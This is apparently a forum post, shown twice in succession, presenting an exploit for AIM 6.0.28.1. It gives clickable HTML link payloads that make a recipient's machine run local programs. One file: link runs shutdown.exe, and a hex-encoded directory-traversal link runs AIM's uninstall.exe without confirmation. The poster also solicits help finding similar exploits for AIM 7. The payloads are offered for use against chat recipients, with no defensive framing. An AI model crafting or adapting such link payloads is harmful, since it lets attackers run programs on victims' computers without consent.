AIM 6.0.28.1 Uninstall Exploit
By exploiting how AIM 6.0 parses and runs links, you can force AIM to uninstall itself without a confirmation,
using a simple link.
AIM 6.0 does not protect against having files executed from links. You could send
<a href="file:c:/windows/system32/shutdown.exe">click me</a> and as soon as they click it they will shut
down. Now for this to work you need to know the windows version and the drive they are running AIM on,
so how would this be an exploit? Read on.
A Brief Description of How This Exploit Works:
When sending links, if you include a colon in the URL, AIM automatically adds the path to the
imApp/[version]/content/im directory of AIM.
Example:
Send:
<a href=":">a</a>
AIM Replaces This With:
<A title=: contentEditable=false href="file:///c:/program%20files/aim6/services/imApp/ver6_0_28_1/content/im/:" unselectable="on">a</A>
After Changing the Directory:
<A title=: contentEditable=false href="file:///c:/aim6%20test/services/imApp/ver6_0_28_1/content/im/:" unselectable="on">a</A>
So, as you can see, a simple colon will throw in the drive, path of the im folder, then tack on that colon.
You can add things after the colon to change the URL, so if you send
<a href=":/hey.html">a</a>
You Get:
<A title=: contentEditable=false href="file:///c:/program%20files/aim6/services/imApp/ver6_0_28_1/content/im/:/hey.html" unselectable="on">a</A>
So why not try directory transversal to run files since a colon supplies the path we need?
Well, AOL thought of this, and decided to filter it out, but I don't see why since you could just use
file:c:/windows/system32/logoff.exe or a direct path to another file you wanted to run, and that
won't get filtered.
So since /.. or even /. gets filtered out of our URLs we have to use hex encoded /../'s
Proof of Concept Send:
This will uninstall AIM by the click of a link without a confirmation and without having to know the install
drive or path, although you are limited to basically running just the files in the AIM install folders.
This is assuming that the uninstall.exe is still in the same place as normal.
For me this is Drive:\main AIM directory\uninstall.exe
<a href=":/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/uninstall.exe">click!</a>
any one please post verison that work, Only work Older verison beta was AIM 6.0.28.1 any one find aim7 like this, let me know i able to help and find exploit for it.
By exploiting how AIM 6.0 parses and runs links, you can force AIM to uninstall itself without a confirmation,
using a simple link.
AIM 6.0 does not protect against having files executed from links. You could send
<a href="file:c:/windows/system32/shutdown.exe">click me</a> and as soon as they click it they will shut
down. Now for this to work you need to know the windows version and the drive they are running AIM on,
so how would this be an exploit? Read on.
A Brief Description of How This Exploit Works:
When sending links, if you include a colon in the URL, AIM automatically adds the path to the
imApp/[version]/content/im directory of AIM.
Example:
Send:
<a href=":">a</a>
AIM Replaces This With:
<A title=: contentEditable=false href="file:///c:/program%20files/aim6/services/imApp/ver6_0_28_1/content/im/:" unselectable="on">a</A>
After Changing the Directory:
<A title=: contentEditable=false href="file:///c:/aim6%20test/services/imApp/ver6_0_28_1/content/im/:" unselectable="on">a</A>
So, as you can see, a simple colon will throw in the drive, path of the im folder, then tack on that colon.
You can add things after the colon to change the URL, so if you send
<a href=":/hey.html">a</a>
You Get:
<A title=: contentEditable=false href="file:///c:/program%20files/aim6/services/imApp/ver6_0_28_1/content/im/:/hey.html" unselectable="on">a</A>
So why not try directory transversal to run files since a colon supplies the path we need?
Well, AOL thought of this, and decided to filter it out, but I don't see why since you could just use
file:c:/windows/system32/logoff.exe or a direct path to another file you wanted to run, and that
won't get filtered.
So since /.. or even /. gets filtered out of our URLs we have to use hex encoded /../'s
Proof of Concept Send:
This will uninstall AIM by the click of a link without a confirmation and without having to know the install
drive or path, although you are limited to basically running just the files in the AIM install folders.
This is assuming that the uninstall.exe is still in the same place as normal.
For me this is Drive:\main AIM directory\uninstall.exe
<a href=":/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/uninstall.exe">click!</a>
any one please post verison that work, Only work Older verison beta was AIM 6.0.28.1 any one find aim7 like this, let me know i able to help and find exploit for it.
